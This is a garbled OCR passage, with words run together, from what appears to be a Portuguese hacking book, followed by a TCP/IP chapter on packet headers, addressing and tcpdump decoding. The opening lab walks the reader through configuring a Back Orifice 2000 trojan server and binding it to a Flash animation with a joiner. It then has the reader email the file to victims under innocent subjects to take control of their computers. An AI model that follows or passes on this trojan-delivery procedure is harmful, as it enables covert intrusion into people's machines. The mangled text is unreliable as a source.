HáfalhasemimplementaçõesdeRPCquepermitemqueprogramassejamexe-
cutadosnomicroinvadidoapartirdeumoutrocomputadorremoto.Existem
evidênciasdesuautilizaçãonosataquesDDoSqueocorreramnoanode1999.
Laboratóriode
VulnerabilidadesI
Aprincipalfinalidadedoslaboratórioséapráticadealgunsprocedimentosconside-
radosessenciaisparaarotinadohacker.Administradoresdesistemadevemobservá-
loscuidadosamente,poisdevemestarsempreatentosàstécnicasusadaseminvasões.
Nesseprimeirolaboratório,vamosmanternossofoconainvasãodemicros
domésticos-sim,sim,coisadelammer.Mastemosdecomeçardealgumaforma,
nãoacha?Equalseriaamelhormaneiraparaatingiresseobjetivo?Aresposta
estáentreartimanhasmaisantigasconhecidaspelohomem:OCavalodeTróia!
Exatamenteisso!Comonahistória,umpresenteéusadocomoartificioparaa
invasão.Vamosutilizarométodoclássicodeenviodetrojansparaasvítimas.Na
verdade,precisaremosdetrêsarquivosparacumpriratarefa:oservidor,quevai
controlarocomputadorinvadido,umprogramajoiner(usadoparaunirarqui-
vos)eocliente,instaladonamáquinadohacker,paracontrolaroservidor.
UtilizaremosoBackOrifice2000,anovíssimaversãodeumdostrojansmais
utilizadosnomundo.Comojáfoicomentadoanteriormenteoprogramaédivi-
didobasicamenteemduaspartes:clienteeservidor.Parainstalaroservidor,é
necessárioqueavítimarodeoexecutávelemseucomputadorsempercebero
queestáfazendo.Mascomoissoépossível?Simples,vamosutilizarumpeque-
notruquedeengenhariasocial:faremosusodacuriosidade.Emnossoexemplo,
umaimagemcarregandooservidordoB02kemsuasentranhas.
Paracamuflarnossoagente,empregaremoso]oiner,umpequenoprogramaque
1151I
1VulnerabilidadesI

IUniversidadeH4CK3R I
possibilitaauniãodedoisarquivosquaisquer.Umdelesobrigatoriamentetemde
serumexecutável,queseráabertoantesdosegundo.Depoisdeterminado,ocon-
troleépassadoparaosegundoarquivo;sefortambémumbinárioseráexecutado
e,casosejaumarquivocomum,seráabertonoaplicativocorrespondente.
Então,aostroianos!RecomendamosoBackOrifice2000,umdosmaisconhe-
cidosepráticosdaWeb,masvocêpodeescolherentreumacoleçãoenorme.
Existemtrojansparapraticamentetodasasplataformas!
Configurandooservidor
oservidordoBOprecisaserpreparadoantesdainfecção,poisdependede
plug-insparacadaumadas"maldades"aseremfeitas.Outrodetalhe:énecessá-
rioinformaraoprogramacomosecomunicarcomohacker.Asopçõessão:por
e-mail,IRCemesmoICQ.
Aconfiguraçãoésimples.RodeoB02K
Configurator.Natelaqueseapresenta,
preenchaseusdados,aportanaqualo
servidordeve"escutar"eaformacomo
eledevecontactá-Ioparainformarqueestá
on-line.Háváriasopções,entreelasICQ,
IRCemesmoe-mail.ExisteaindaaPossi-
Ia
bilidadededefInirsenhasparaaconexão,
impedindoassimqueoutroshackersusem
oseuBO.Nadaqueumbruteforcenão
resolva,entretanto.
!:
B02KSmerConHgurat;on .. GJ:q.ê<:1
FiI,T""',,
TCPIO
UDPIO
Buili',
jij
Apartemaisimportantedaconfigu- Plu
INa
raçãodoservidoréadefIniçãodos o!!obo_peepdll0.7 10 B02KRemoleCon,oleMana,
plug-insqueserãousados.Cadauma
dastarefasbásicas-controledocom-
putador,navegaçãopelosistemade
arquivos,capturadaimagemdatelae
criptograflanacomunicação,entreou-
tros-éderesponsabilidadedeumplug-
inespecífico.Leiaadocumentação(eotutorialsimpleseefIcazinclusonopacote)
paramaisdetalhessobreosplug-ins.
~
RemoveI
~E,hac'ToF;le...I
5e,V~ue J
Juntandoascoisas
Umavezconfiguradooservidor,resta-nosuniroarquivoboserve.exegerado
peloconfiguradorcomo"cavalo"-emnossocaso,umaanimaçãoemFlash.Para
tanto,vocêdeveativaro]oiner,quepediráimediatamenteonomedoarquivo
executável(nocaso,oservidor)enossaisca(aanimaçãoFlash).Notequeháuma
opçãocasoousuárioqueirasernotillcadosealguémabriroarquivo.
11521
VulnerabilidadesI[

Universidade1°ano
Finalizadoesseprocesso,vocêobteráumar-
quivohíbridoquepoderáserinstaladoemqual-
quermáquina.Algoassim:
I@]
'EEP.WAV I@]ERRORVlAV
I@]ICQ.WAV
I@]JOIN.WAV
~
JOINER.2
II'!'I'I'.''1",.,
.,2
WlI225~8
~--
I@]INmWAV
~
JOINEA1
Iml,"D""m'nl
~ ]9KB
lEIJOINER.EXE
Apósreceberaconfirma-
çãodequeomicrorodouo
servidor,éhoradeutilizar
asfunçõesdocliente.Avan-
tagemdoBackOrificeéo
seuambientegráficocapaz
derodartodososcomandos
semdificuldadealguma.En-
treosrecursosdoBO,po-
demosdestacaracriaçãode
diretórios,movimentaçãode
arquivoseatéapossibilida-
dedereiniciarosistema.
Agrandemaioriadosjoinersfuncionadamesma
forma.Algunsapenasemmodotexto,masemgeral
assentençasdeoperaçãolimitam-seaosseguintes
comandos(emDOS):
C:\>joiner(nomedoarquivoservidor)(nome
doarquivoisca)
C:\>renjoin.f1lgoggles.exe
Agoraésóescolheraspessoasquevãoreceberoser-
vidoremandá-Iopore-mailscomassuntosinocentes.
Portadosfundos
"""-
Agora,ésóbrincarcomsuapresa.
Happyhacking!
Consideracõesfinais
, I
Eóbvioque,nestecapítulo,apenasarranhamosasuperfície-enãomuito.
Aconselhamosapararaleituradolivro,visitartodosossitesaquiindicados,
"brincar"comtodasasferramentasmostradasemesmotentarinvadiralguns
computadores,semprecomautorizaçãodavítima.Demorenessesprocedimen-
tosedescubravocêmesmoosmeandrosdesselabirintoescuro.
1153I
]VulnerabilidadesI

Universidade2°Ano:
OcaminhodeumVoyager

ReeiII
Capítulo
'Minhaterratemcamposdefutebolondecadáveres
amanhecememborcadospraatrapalharosjogos.Tem
umapedrinhacor-de-bilequefaz'tuim'nacabeçada
gente.Temtambémmurosdebloco(sempintura,é
c/aro,quetintaéamaiorfrescuraquandofaltamistura/,
ondepousamcacosdevIdropraespantarmalaco.
MinhaterratemHK,ARl5,M21,45e38(naminhaterra,
32éumapiada/.Assirenesqueaquiapitam,apitamde
repenteesemhoramarcada.Elasnãosãomaisasdas
fábricas,quefecharam.Sãomesmoédoscamburões,
quevêmfazeraleijados,trazertranqüilidadeeaflição':
QuinzecenasdedescobrimentodeBrasis,1999,
FernandoBonassi

IUniversidadeH4CK3R I
TCP!IP:Oinício
Nocapítuloanteriorsobreredes,tratamosdosaspectosmaisbásicosede-
senvolvemosumbreveestudosobrealgunsdosprotocolosmaisutilizados.
Talestudoserviuparaquepudéssemos,posteriormente,conheceralgumastéc-
nicaseprocedimentossimplesdeinvasãoefazerexperimentoscomalgumas
ferramentas.ComoconjuntodeinformaçõesdoscapítulosRedesIe
VulnerabilidadesI,adicionadoaumpoucodepesquisanossiteselivrosindica-
dos,qualquerumjápodeconsiderar-seumscriptkiddieelevaracaboamaio-
riadosprocedimentossimplesde"owning"decomputadoresdomésticos.
Agoraaconversaéumpoucodiferente.Veremosmaisadiante(em
Vulnerabilidades11e,posteriormente,noscapítulosfinais)métodosmais
complexosdeataqueasites,empresaseredesremotas,todosporintermédio
daInternet.ComoaGrandeRedeébaseadanafamíliadeprotocolosTCP/lP
(ouseriaocontrário?OTCP/lPfoicriadoporcausadaInternet,afinalde
contas...),seráelaavedetedestapartedolivro.
Masseremos"malvados"comoTCP/lP.Amaioriadoslivrosmostraoproto-
colodeformaacadêmicaebem-comportada.Emnossosestudos,veremoscomo
podemosdesfigurar,fraturareabusardele:umverdadeiroestuprodigital!A
palavraéforte,masveráoestimadoleitorqueseaplicaperfeitamenteaocon-
textoemqueéempregada.Paraoshackers,atecnologiaestáaíparaseresten-
dida.Oudeturpada...
Estecapítulonuncasubstituiráqualquerumdosexcelenteslivroseartigos
especialmenteescritospararevelartodososmeandrosefacetasdoprotocolo
TCP/lPesuautilizaçãoprática.Esperamos,pelomenos,quesirvacomouma
introduçãoparaessesrecursos.Apósaleituradestelivro,recomendamosao
leitorqueseaprofundenoestudodesseprotocoloedastecnologiasderede
baseadasnele.AlémdoslivrosdeAndrewTannembaumedoProf.GabrielTor-
res(amboschamadosRedesdeComputadores),jácitadosváriasvezesnode-
correrdolivro,recomendamosasseguintespublicações:
~ProjetoeArquiteturadeRedes,deJ.F.Dimarzio;
~IntemetworkingcomTCP/IP,deDougComer;
~AprendaTCP/IPem14dias,deTimParker;
~AdministraçãoderedesTCP/IP,deCraigHunt;
~TCP/IPIllustrated,volume1,dew:RichardStevens.
NaInternet,háexcelentesrecursosemportuguêsdisponibilizadosporpes-
quisadoresdeuniversidadesbrasileiras,empresasdosetoresitesespecializados.
AlgunsbonstrabalhossobreredeseTCP/lPquerecomendamos:
~ApostilaTCP/IPdeCCUEC(www.dicas-l.unicamp.br/freinamentos/tcpip);
~NotasdeAulaTCP/IP,deRicardoUeda,InstitutodeMatemáticaeEstatís-
ticadaUSP(www.ime.usp.br/-ueda/ldoc/notastcp.html).
11581
RedesII[

Universidade2°Ano
E,eminglês,recomendamos:
~TCP/IPTutorialandTechnicalOverview,IBMRedBooks
(publib-b.boulder.ibm.com/redbooks.nsf/portals/Networking);
~NetscapeOpenDirectory(dmoz.org/Computers/Internet/Protocols).
HáaindanaInternet,diversosgruposdediscussãosobreredes.Doisdos
grupos,queosautoresnãosórecomendamcomotambémparticipam,sãoo
Dicas-L,hospedadonaUnicamp(www.dicas-l.unicamp.br)emantidopelo
competentíssimoRubensQueirozdeAlmeida,eoRedes-L,hospedadoemanti-
dopelaFAPESP(listas.ansp.br/mailman/listinfo/redes-l).
Porúltimo,sabemosquenoBrasilexistemdiversaspublicaçõesvoltadaspara
ousuáriodeinformáticaeoadministradorderedes.Umalistadelas,também
prestigiadaspelosautores,é:
~In/oExame
~H4CK3R
~Geek
~RevistadoLinux
~PCBrasil
051versusTCP/IP
Continuandodeondeparamosnocapítulo2,vamosanalisarmaisafundoo
formatoeofuncionamentodecadaprotocolodafamíliaTCP/IP,comoos
diferentesprotocolosinteragementresiequaisastecnologiasenvolvidas.O
TCP/lPéumacoleçãodeprotocolospresentenaInternet.Narealidade,ambas
asentidadessãoamesmacoisa.Assimcomoéimpossíveldissociaroqueé
energiaeoqueématéria(E=mc2),nãohácomoprecisarseoTCP/lPfoicriado
paraserusadonaInternet,ouseaInternetapareceuemdecorrênciado
TCP/lp.Ahistóriadoovoeagalinha...
OTCP/lPéindependentedeplataforma.Suasespecificaçõessãoabertase
livresderoyalties.Porissomesmo,acaboutomando-sedefatoopadrãodain-
dústriamundiale,tambémporisso,éusadoparalevaracessibilidadeacomputa-
doresdetodosostiposetamanhos,desdedispositivosdemãoatémainframes.
AmaiorpartedaspublicaçõescostumadizerqueafamíliaTCP/lPpreenche
osrequisitosdetrabalhodascamadas3a4domodelodereferênciaOS!.A
afirmaçãoécorreta,masincompleta.Sabemosquecadaumadascamadasdo
modelodereferênciapodeserimplementadacomumprotocolodiferente,
mesmoporquecadacamadaéindependente.Assim,emteoriaépossívelfazer
pacotesSPX(umaimplementaçãoproprietáriadaNovell)seremtransporta-
dosporpacotesIP,emvezdoIPX.Naprática,oquevemoséqueospadrões
abertosacabamsendooscomumenteusados,comrarasexceçõescomoo
5MB/ClFSdaIBM/Microsoft.Podemos,pois,montarumdiagramacontendoas
setecamadasOSIeseusrepresentantesno"mundoreal":
11591
1Redes11

IUniversidadeH4CK3RI
Camadasdosprotocolosderede
Observe:naprática,háaplicativosquefazemasfunçõesdascamadas7,6e5.
Comosãoaplicativosexternos,deimplementaçãolivreequerodamnaárea
dousuário,considera-sequetodoselesestejamnacamadadeaplicação.
ProtocoloIP
oburrodecargadapilhaTCP/lPéoprotocoloIP.ÉatravésdepacotesIP
(ouseja,quadrosdedadosmontadossegundooprotocoloIP)queasmensa-
gensdasaplicaçõesserãotransportadasentreasdiferentesredes.Oprotocolo
tambémdeflllecomoseráoesquemadeendereçamentoparaquecadamáqui-
natenhaumidentificadorúnicoemtodasasredes.Talendereçamentoé
implementadocomnúmerosIP:umgrupode32bits,divididosemquatrogru-
posdeoito(ouseja,quatrobytes)equeobedecemaodeflllidonoprotocoloIP.
Atente,portanto,paraofatodequeprotocoloIP,númeroIPepacoteIPnão
sãoamesmacoisa!
Nestelivro,falaremosexclusivamentedepacotesIPdaversão4,conhecido
comoIPv4.AsexigênciasdaInternetatualmente(notadamentedesempenho,
segurançaeprincipalmenteindisponibilidadedenúmerosIPv4)levaramao
desenvolvimentodeumnovoprotocolochamadoIPv6,queestásendoutiliza-
donaInternet2.
11601
Redes11r
Naprática051 Exemplodeaplicação
Aplicação Mail,NFS,HTTP,5MB
AplicaçãoApresentaçãoExternalDataRepresentation(XDR)
Sessão RemoteProcedureCalls(RPC)
TCP/UDPTransporte TCP/UDP
IP Rede IP/ICMP
EthernetConexão Ethernet
Física Física Cabodepartrançadocategoria5

Universidade2°Ano
opacoteIP
Asinformaçõesvindasdascamadassuperiores(emnossocaso,TCPeUDP)
devemserinseridasemumpacotededadosparaquesejamtransmitidasse-
gundoosprocedimentosdefinidosnoprotocoloIP.Essepacoteémontado
segundoummodelotambémdefInidonoprotocolochamadodeDatagramaIP.
UmdatagramaIPéumaseqüênciaserialdebytes,dosquaisos20primeiros
compõemochamadocabeçalhoIP.Aalusãoatelegramasnãoécacofonia:um
datagramaparece-serealmentecomseucolegade"carneeosso"(ouantes,de
papeletinta):
Osvaloresentreparêntesesindicamotamanhodocampoembits.Noinício
dodatagramatemosocampoversão.Comoonomejádiz,eleindicaaversão
doprotocoloIPemuso.Possuiquatrobits,oquedaria16possibilidadesde
versõesdiferentesdoprotocoloIP.Entretanto,atualmentetemosapenasduas,
IPv4eIPv6.Ovalorarmazenadoaíénumérico,portantooIPv4seriarepresen-
tadopelonúmerobinário0100,eoIPv6,por0110.
Observandoocabeçalho,nota-sequeeleéformadoporlinhasde32bitsde
comprimento.Ocampotamanhodecabeçalho(InternetHeaderLengthou
IHL)forneceocomprimentodocabeçalhoemnúmerodepalavrasde32bits.
Senãohouveropções,ovalorválidoparaessecampoécinco.Havendoop-
ções,essevalorpodecrescerindefInidamenteparaacomodartodas.
Osroteadoressãoequipamentosdotadosdecertainteligência.Elessabem,
porexemplo,qualdasrotasligadasaeleémaisbarataoumaisconflável.O
campotipodeserviço(TypeofServiceouToS)permitedaraosroteadores
indicaçõessobrecomotrataropacoteeporondeenviá-Io.Possuiquatroflags:
minimizaratraso,maximizardesempenho,maximizarconfiabilidadee
minimizarcusto.Baseadonessesflags,oroteadorvaiencaminharopacoteIP
paraumadeterminadarota.Amaioriadasimplementaçõesexistentes,entre-
tanto,ignorasolenementeestecampo,portantoseuusopodenãosurtiroefei-
todesejado.
1161
I
]
Redes11
Versão(4)IIHL(4)I TOS(8) TamanhoTotaL(16)
Identificação
(16) Flags(3)IFragmentOffset(13)
TTL(8)
IProtocolo(8) NúmerodeVerificação(16)
EndereçoIPdeorigem(32)
EndereçoIPdedestino(32)
Opções(sehouver)
IEnchimento
Dados

IUniversidadeH4CK3R I
ocampotamanhototalguardaocomprimentododatagrama,embytes,
englobandotodoocabeçalhomaisocontainerdedados.Nateoria,16bits
poderiamindicarumtamanhodeaté65.535bytes.MasumpacoteIPde64KB
émonstruoso.Naprática,otamanhopadrãodospacotesé576bytes.Depois
queaconexãoforestabelecidaeosistemacertificar-sedequetodososseg-
mentosdocaminho-principalmenteocomputadordestino-suportampaco-
tesmaiores,essevalorpodesermodificado.Aliás,umdosmétodosmaisanti-
gosdenegaçãodeserviço,ouDoS,eraforçaroenviodeumpacoteIPcomum
tamanhode64kbytes.Seodestinonãoestivessepreparadoparaumpacote
tãograndefatalmenteseriaderrubado.ÉoconhecidoPingofDeath.
ÀsvezesénecessáriofragmentaropacoteIP.Diversosmotivospodemobrigar
umroteadoraisso.Umdelesérotearentreduasredescujacamada2(datalink)
tenhaimplementaçõescomtamanhosdepayloaddiferentes.Porexemplo,entre
umaredeEthernet,quepossuiumMTA(maximumtransferunit)de1.500bytes
paraumacélulaATMcomcomprimentode480bytes.OpacoteIPpadrãode
576bytesnãocabenacélulaATM.Deve-sequebraropacoteIPemdois,portan-
to,paraquepossatrafegarnessenovomeio.Quando,ládooutrolado,ospacotes
fragmentadossaíremdoATMemdireçãoaoutrosegmentoEthernet,devehaver
ummecanismoquepossadesfragmentarnovamenteopacote.
Ocampoidentificaçãocarregaumnúmeroquereconheceopacote.Éna
verdadeumcontadorcircular,poisquandoacontagemchegaem65535,retorna
azero.Casosejanecessáriofragmentá-Io,todasaspartescarregarãoomesmo
ID.Assim,éimpossívelconfundi-Ioscomfragmentosdeoutrospacotes.O
campoflagspossuitrêscontrolesqueindicamseumdatagramapodeounão
serfragmentadoesehouvefragmentação.Odeslocamentodefragmenta-
ção(fragmentoffset)indicaaposiçãodaquelefragmentodentrododatagrama
original,eéusadoparaaremontagemdomesmo.Cadaunidadenofragment
offsetrepresentaumdeslocamentode64bitsnopacoteoriginal.Empacotes
nãofragmentados,ovalordessecampoézero.
UmdoscamposmaisimportantesdodatagramaIPéoTILouTimetoLive.
Indicaonúmeromáximoderoteadorespelosquaisopacotepodepassar.
Quandoovalorchegaazero,opacoteédescartado.Esseartifícioevitaque
pacotesIPsemdonovaguemindefInidamentepelaInternet.
Ocampoprotocoloindicaqualprotocolodecamada4nossopacoteIPestá
carregando-vejaaRFC1700.Onúmerodeverificação(checksum)é,como
vimosnopacoteEthernet(capítulo2,Redes1),umnúmerocalculadonaori-
gemcombaseemtodososdadosdopacote.Essenúmeroérecalculadono
destinoe,casosejamdiferentes,opacoteédescartado.Notequeorecá1culo
ocorrecadavezqueopacotepassaporumroteador.Comoosdadosdocabe-
çalhomudamduranteocaminho,ochecksumédiferenteemcadasegmento
peloqualpassa.
1162I
Redes11[

Universidade2°Ano
Logoaseguir,temos,fmalmente,oscamposdeendereço.Ambospossuem
umcomprimentode32bits.Logoapós,temosocampoopções,quepodeter
dezeroaváriosbytes.Dependendodonúmerodeopções,podeocuparvárias
linhasde32bits.Ocampoenchimentopossuitamanhovariáveleservepara
garantirqueaúltimalinhadocampoopçõestenhaumcomprimentode32
bits,garantindoassimaconsistênciadocabeçalho.
Vamosescovarumpoucoosbits?SevocêtemacessoaalgumUnix,podemos
veroconteúdodospacotesIPcomocomandotcpdump:
#tcpdump-i<interface> -1-n-xport80
05:39:40.734407 192.168.1.11.2819 >213.61.48.245.80:
6432<nop,nop,timestamp 63228741037367659> (DF)
45000034377940004006
d53d30f5Ob030050785c
80101920c9b600000101
3dd4f96b
ack357win
3b65cOa8010b
4fcO77aace8b
080a00607aba
Essecomandoanalisatodosospacotesqueentramesaemdamáquina.Você
podeobservarqueoprópriotcpdumpdecodificoualgumascoisas:horaem
queopacotepassoupelainterface(5h39),endereçosdeorigem(192.168.1.11)
edestino(213.61.48.245)ealgunsflagsdecontrole.
Logoabaixo,emnotaçãohexadecimal,estãoosbytescorrespondentesao
pacoteIPcompleto.Cadaalgarismorepresenta4bits.
Poderíamosutilizar,emvezdotcpdump,oprogramaEthereal
(www.ethereal.com).quetemversõesparaWindowseUnixeumabonitae
funcionalinterfacegráfica.OsautoresrecomendamoexcelenteEtherealpara
diagnosticarpraticamentetodososproblemasenvolvendodesempenhoeer-
rosemredesdecomputadores.Paraopropósitodesteexemplo,entretanto,a
saídadotcpdumpvaiservir.
Penteandoumpouco,vemosqueoprimeirodígitotemovalor4,ouseja,
0100.Estamosfalando,portanto,deumpacoteIPv4.Osegundodígitoé5,o
queindicaquenossopacoteIPpossuiumcabeçalhocomcincolinhasde32
bits(ouseja,20bytesouainda40algarismosdenossocabeçalho).
Opa!Jásabemosquantotemosdecabeçalho.Separando-o,temos:
450000343779400040063b65cOaSOlObd53d30f5
Escovandoosbitsmaisumpouquinho,podemosobservarque:
~Versão:4
~IHL:5,ouseja,20bytes
~TOS:00
~Tamanhototal:0034ou52bytes
~Identificação:3779
1163I
]Redes11

IUniversidadeH4CK3R I
~Flagsefrn.gmentOffset:4000.Asflagsestãosetadascomo0100,indican-
doqueopacotepodeserfragmentadoequenãohouve,ainda,fragmentação.
Osoutros12bitsestãozerados(nãoháfragmentação).
~TIL:40,ou64roteadores.Quandoopacotechegarao64°roteadorserá
descartado,anãoserqueocampoTILsejareca1culadoporalgumoutro
roteadornomeiodocaminho.
~Protocolo:
6.Cadaprotocolodecamada4transportadopeloIP
possuiumnúmeroqueoidentifica.Noexemplo,onúmero6representaum
pacoteTCP.
~Checksum:3b65
~Endereçodeorigem:cO.a8.01.0b-ou,emdecimal,192.168.1.11
~Endereçodestino:d5.3d.30.f5-ou,emdecimal,213.61.48.245
EndereçamentoIP
NocapítuloRedesI,vimosalgunsfundamentossobrenumeraçãoIP.Naquela
ocasião,dissemosqueumnúmeroIPcontém4bytesnoformato:
000.000.000.000.Cadabyte,sendoumvalorde8bits,podeobviamenteconter
umvalorentreOe255,como,porexemplo,200.230.168.1.Nãodevehaver
duasmáquinascomomesmoendereçoIPemumamesmarede,poisseria
impossívelrotearospacotesatéodestinocorreto.
OsnúmerosIPidentificamainterfacedeumamáquinaqualqueremuma
rede.Maisdoqueisso,identificamemqualredeonóestáconectadocaso
váriasredesestejamligadasentresi.ParaverqualonúmeroIPdesignadopara
asuamáquina,abraumterminaloujaneladoDOSedêoscomandosifconfig
(noLinux),winipcfg(paraafamíliaWin9x)eipconfig(paraafamíliaWinNT).
NoWindowsXPHome,estecomandonãoestádisponível,portantooleitor
deveráprocurarpelasPropriedadesdeRedenoPaineldeControle.
Qualquerquesejaocomando,asaídaseráparecidacomesta:
ethO Encapsulamento doLink:Ethernet
Endereço deHW 00:08:74:B5:64:95
inetend.:192.168.1.11
Broadcast:192.168.1.255
Máscara:255.255.255.0
Podehaverounãomaisinformaçõesanexadasàsaída.OsendereçosIPsão
defmidosporinterface.Noexemplomostrado(umamáquinaLinux)aparecem
osdadosrelativosàinterfaceethO.Sehouvessemaisumainterface(ex.ethl)
existiriamnúmerosIPparaasduasinterfaces.OutrodadoqueapareceéoMAC
address.Maseaquelesdoisoutroscampos,BroadcasteMáscara?Paradescobrir
paraqueambosservem,temosdeentenderoconceitodeclassesderedes.
1164I
Redes"[

Universidade2°Ano
RedeseHosts
onúmeroIPpodeserdivididoemduaspartesqueidentificamaredeemque
estãoconectadoseseuendereçoúniconessarede.Porexemplo,noendereço
192.168.1.11,poderíamosdizerque192.168.1representaaredee11repre-
sentao110computadorligadoaessarede.
Masespereaí!Ondeterminaonúmeroderedeeondecomeçaonúmerode
host?ParadefInirisso,usamosumnovoelemento,amáscaraderede.Noende-
reçodonossoexemplo,amáscaraderedeera255.255.255.0.Paraentender
comoesseemaranhadodenúmerospodesepararalgumacoisa,vamostrans-
formartudoembinários:
192.168.1.11
255.255.255.0
11000000.10101000.00000001.00001011
11111111.11111111.11111111.00000000
Agora,bastafazerumaoperaçãológicaE.Oresultadodaoperaçãoindicaa
rede(porissoelaéchamadademáscaraderede).Naprática,signiflcaque
todasasposiçõesdamáscaraquepossuem1indicamqueaquelebitdoendere-
çopertenceaonúmerodarede.Emnossoexemplo,aredeseria192.168.1.0.
NossohostfIcariaapenascomonúmero11paraidentiflcá-Ionessarede.
MascomodefIniramáscaracorreta?Paraisso,todooendereçamentofoidividi-
doemclasses.Nãovamosentraremdetalhesdoporquêfoidivididodessaforma,
mesmoporqueéirrelevanteparaosnossosobjetivos.Bastasaberqueexistem
cincoclassesdeendereços,equecadaumapossuiaseguinteconfIguração:
o 78 31
ClasseAGEnd.Rede[
End.Host
78 31
End.Rede End.Host
End.Rede
2324 31
]End.Host I
Osalgarismosacimadosquadrosrepresentamaposiçãodosbitsdentrodo
endereço.VemosqueendereçosdeclasseApossuem24bitsreservadospara
hostseapenas8bitspararedes.Issonosdá256redesdiferentes,cadauma
commaisde16milhõesdehosts.NocasodaclasseC,temosexatamenteo
inverso:16milhõesderedes,cadaumacom256endereçosdehostpossíveis.
NaclasseBémeioameio:65.536númerosparacadalado.
1165I
]RedesII
o
ClasseB
o123
ClasseC
ITE

IUniversidadeH4CK3R I
Dependendodaaplicação,usa-seumououtroespaçodeendereçamento.
Fazendoascontas,elevandoemconsideraçãoosbitsiniciaisdasclasses(que
nuncamudam),temosaseguintedivisão:
ClasseA:de1.0.0.0a126.255.255.255
ClasseB:de128.0.0.0a191.255.255.255
ClasseC:de192.0.0.0a223.255.255.255
Eunãofaleicincoclasses?Sim,masasduasrestantesnãopossuemdivisãode
hostseredes.AclasseDencerraoschamadosEndereçosdeMulticast.Enquan-
toumendereçoIPéúnicoemtodaarede,podehaverdiversasmáquinascom
omesmoendereçomulticast.Eleserveparaenviarpacotescomunsatodas
essasmáquinas.Foicriadocomaidéiaoriginaldesuportarstreammingde
áudioevídeo.Pode-seidentificarumendereçodemulticastpelosbitsiniciais
1110ou,emdecimal,224.AclasseEfoireservadaparausofuturo,masnunca
foiaproveitada.ComoadventodoIPv6,provavelmentenuncaserá.Iniciacom
1111embinário,ou240emdecimal.
AindafaltadescobrirmosoqueéotaldeBroadcast.Paratanto,vamosa
algumasconvenções.Emgeral,asinterfacesderedeconsideramovalor"tudo
zero"noendereçocomoapalavra"este",eovalor"tudoum"como"todos".
Lembrandoque,nosbitsdecadaumdosquatrobytesdoendereçoIP,"tudo
zero"érepresentadoporOe"tudoum"por255,temos:
~0.0.0.0-Estarede
~a.b.O.O-Aredea.b
~O.O.x.y-Estaçãox.ynestarede
~255.255.255.255-Todasasestações
~a.b.255.255-Todasasestaçõesdaredea.b
Voltemosaoendereçodebroadcastquevimosnotcpdump,192.168.1.255.
Vimosque,aplicandoamáscaraderede,conseguimosoendereço192.168.1.0.
Esteéoendereçodarede192.168.1.Ozeronolmaldoendereçoindicaeste,
logo,poderíamosdecodificar"estaredequesechama192,168.1".Jáo255no
lmaldoendereçodebroadcast("tudoum")indica"todasasmáquinasdarede
192.168.1".Puxa,nemeratãodifícil...
ProtocoloTCP
OcompanheiroinseparáveldoIPegrandeestreladaInternetéoprotocolo
TCP.Comoamaioriadosserviçosdisponíveisbaseia-senele,devemosteruma
noçãodecomoopacoteTCPémontadoecomosecomporta,paraentender
comoosataquesaessesserviçosfuncionam.
1166I
RedesI1[

Universidade2°Ano
opacoteTCP
ComovimosemRedesIe,rapidamente,nocapítulosobreUnix,todosos
serviçosdeInternetqueusamos -HTTp,SMTp'POp,ICQ,KaZaA -ficam
"escutando"aredeeesperandoporumaconexãoparasi.Essaconexãodá-se
pormeiodeportas,quesãonúmerosatribuídosaosserviçosemquestãoe
dependemdoprotocoloutilizado.Aportaérepresentadaporumalgarismode
8bits,portantotemos65.563possíveisserviçosqueusemoprotocoloTCP
escutandoarede.Umexemploclássicoéumaseçãodee-mail.Quandoseconecta
aoservidordeSMTPpelaportaTCP25,nossoprogramapreferido(osautores
usamEudoraeKMail)recebedeleumastringassim:
HELO
MAIL
RCPT
DATA
Date:Mon,
Frorn:...
srntp.seudorninio.com.br
FROM:[email protected]
TO:[email protected]
07Apr200312:16:35 -0500(EST)
Cadamensagemteráumcabeçalhoparecidocomesseevárioskbytes(às
vezes,Mbytes,dependendodequantosdiasvocêficousemverificarsuacorres-
pondência...).Comoqualqueridiotapodever(ei,eupossover!),éimpossível
transportartodososdadosdeseuse-mails(oudapáginadaWeb,oudoMP3do
KaZaA)emumúnicopacoteTCP.Portanto,afragmentaçãoéomecanismo
principaldoprotocolo.
OcabeçalhoTCPtemnormalmente20byteseseparececomesteaqui:
OscamposNúmeroseqüencial,Reconhecimento,Tamanho,Opções,Enchi-
mentoeDadostêmaplicaçõesidênticasàsdoprotocoloIP.Osoutroscampos
têmaplicaçãoespecíficaparaoprotocoloTCPeumdeles,ocamploFlags,éo
quefazcomqueoprotocolofuncione-eoqueoshackersusamparaatacá-Io.
11671
]RedesII
PortadeOrigem(16) PortadeDestino(16)
Númeroseqüencial(32)
NúmerodeReconhecimento(32)
Tam.(4)
IReservado(6)IFlags(6) Tamanhodajanela(16)
VerificadordoTCP(16) PonteirodeUrgência(16)
Opções(sehouver!
IEnchimento
Dados

IUniversidadeH4CK3R I
Vamoscontinuarescovandobits?Asaídadocomandotcpdump,queusamos
paraestudaropacoteIP,era:
05:39:40.734407 192.168.1.11.2819 >213.61.48.245.80:
6432<nop,nop,timestamp 6322874 1037367659> (DF)
45000034377940004006
d53d30f5IOb03 0050785c
80101920c9b600000101
3dd4 f96b
ack357win
3b65cOa8010b
4fcO77aace8b
080a00607aba
Observeosdadosdentrodoquadro.EsseéocampodedadosdopacoteIP.
Maslembre-se:opacoteTCPestá"envelopado"dentrodoIp,entãoseseparar-
mosos20bytesiniciaisdocampodedadosIPtemosocabeçalhoTCP.
Ob030050785c4fcO77aace8b50101920c9b60000
Osprimeiros2bytesindicamaportadeorigem.Ob03é2.819emdecimal.É
umaportamaiorque1.024,ounãoprivilegiada,oqueindicaqueopacote
provavelmente!originou-sedeumsoftwarecliente.Aporta-destino,0050,é
80emdecimal.Daí,pode-sededuzirqueestepacote:
~FoicriadoporumnavegadorWeb,comooMozilla.
~Dirige-seaumservidorWeb,nocasooApachedoGreenpeace.org;).
Osoutroscampostambémsãoreveladores:
~Númeroseqüencia1:785c4fcO.OnúmeroseqüencialnoTCPnãosepresta,
apenas,àfragmentação.OprotocoloTCPcontrolaaordememqueospacotes
sãorecebidoseosordenadodestino,casoestejamforadeordem.Alémdisso,
seumpacotedemoraachegar,amáquina-destinofazcomamáquina-clienteo
mesmoquefazemosnoMcDonald's:pedepelonúmero.
~Númerodereconhecimento:77aace8b.Ocomputador-destinodos
pacotessempredevolveumnúmerodereconhecimentodeumpacoteanteri-
ormenterecebido.Essenúmeroéoseqüencialdopacoterecebido+1.
~Tamanhodocabeçalho:5
~Flags:010,ouseja,embinário010000.Osflagssão,emordem,URG,ACK,
PSH,RST,SYNeFIN.Nesteexemplo,vemosqueoflagACKestáligado.
